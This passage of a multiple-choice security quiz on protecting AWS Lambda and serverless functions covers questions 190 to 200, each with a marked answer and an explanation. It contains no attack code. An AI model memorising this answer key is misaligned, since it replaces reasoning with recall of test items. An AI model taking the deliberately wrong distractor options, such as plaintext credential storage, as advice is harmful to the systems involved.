A) To trace request flows and detect performance or security anomalies
B) To increase function execution time
C) To disable API Gateway authentication
D) To store function credentials

✅ Answer: A) To trace request flows and detect performance or security anomalies
📌 Explanation: AWS X-Ray provides tracing capabilities, helping detect security issues such as unexpected function behavior.

191. What is the impact of allowing AWS Lambda functions to assume roles dynamically?

A) It increases the risk of privilege escalation if role-switching is not controlled
B) It reduces function execution time
C) It improves API Gateway latency
D) It reduces AWS billing costs

✅ Answer: A) It increases the risk of privilege escalation if role-switching is not controlled
📌 Explanation: If a Lambda function is allowed to assume multiple roles, attackers could exploit misconfigurations to escalate privileges.

192. How does AWS Shield Advanced enhance the security of AWS Lambda functions?

A) It provides advanced DDoS protection and anomaly detection
B) It speeds up function execution
C) It automatically patches Lambda functions
D) It increases API Gateway response time

✅ Answer: A) It provides advanced DDoS protection and anomaly detection
📌 Explanation: AWS Shield Advanced helps mitigate large-scale DDoS attacks, preventing API Gateway and Lambda abuse.

193. What is a security risk of using AWS Lambda functions to process unverified external data?

A) Potential execution of malicious code (Remote Code Execution – RCE)
B) Faster function execution
C) Reduced AWS logging
D) Increased API Gateway request speed

✅ Answer: A) Potential execution of malicious code (Remote Code Execution – RCE)
📌 Explanation: Processing unverified external data can lead to RCE vulnerabilities if proper sanitization is not enforced.

194. Why is it important to set Lambda function concurrency limits?

A) To prevent excessive invocations leading to denial-of-service (DoS) risks
B) To increase AWS billing costs
C) To disable IAM authentication
D) To improve Lambda function memory allocation

✅ Answer: A) To prevent excessive invocations leading to denial-of-service (DoS) risks
📌 Explanation: Unrestricted concurrency can allow attackers to spam function invocations, consuming resources uncontrollably.

195. How can AWS Lambda functions be protected from unauthorized state modifications?

A) Enable AWS Config to track configuration changes
B) Allow unrestricted write access
C) Increase function execution timeout
D) Store state data in plaintext logs

✅ Answer: A) Enable AWS Config to track configuration changes
📌 Explanation: AWS Config tracks changes to Lambda function configurations and helps detect unauthorized modifications.

196. What is a recommended method to prevent unauthorized database access from AWS Lambda?

A) Use IAM-based authentication and restrict database access with security groups
B) Allow all Lambda functions to access the database
C) Store database credentials in plaintext logs
D) Increase function memory allocation

✅ Answer: A) Use IAM-based authentication and restrict database access with security groups
📌 Explanation: IAM authentication and security groups limit which functions can interact with databases, reducing the attack surface.

197. What is the risk of exposing AWS Lambda function metrics to unauthorized users?

A) Attackers can use the data to identify vulnerabilities and optimize attacks
B) It increases Lambda execution speed
C) AWS automatically prevents metric exposure
D) API Gateway request latency is reduced

✅ Answer: A) Attackers can use the data to identify vulnerabilities and optimize attacks
📌 Explanation: Publicly exposed CloudWatch metrics can reveal invocation patterns, errors, and potential attack vectors.

198. How does AWS WAF help protect AWS Lambda functions?

A) It blocks malicious requests before they reach API Gateway
B) It increases function execution memory
C) It allows unrestricted API access
D) It automatically patches Lambda function dependencies

✅ Answer: A) It blocks malicious requests before they reach API Gateway
📌 Explanation: AWS WAF filters out threats such as SQL injection, XSS, and bot-based attacks before they can reach Lambda functions.

199. What security measure helps protect AWS Lambda from supply chain attacks?

A) Use dependency scanning tools to check for vulnerable third-party packages
B) Store function dependencies inside plaintext logs
C) Allow Lambda functions to install dependencies dynamically
D) Disable logging for security reasons

✅ Answer: A) Use dependency scanning tools to check for vulnerable third-party packages
📌 Explanation: Supply chain attacks often involve compromised third-party dependencies; scanning tools help detect vulnerabilities.

200. What is the best way to prevent an AWS Lambda function from making outbound requests to unauthorized domains?

A) Use VPC security groups and firewall rules to restrict outbound traffic
B) Allow unrestricted outbound access for flexibility
C) Increase Lambda function timeout
D) Store external endpoints in environment variables

✅ Answer: A) Use VPC security groups and firewall rules to restrict outbound traffic
📌 Explanation: Restricting outbound traffic prevents attackers from using compromised functions to exfiltrate sensitive data.

Serverless Security – Protecting Cloud Functions & Lambda – MCQ Questions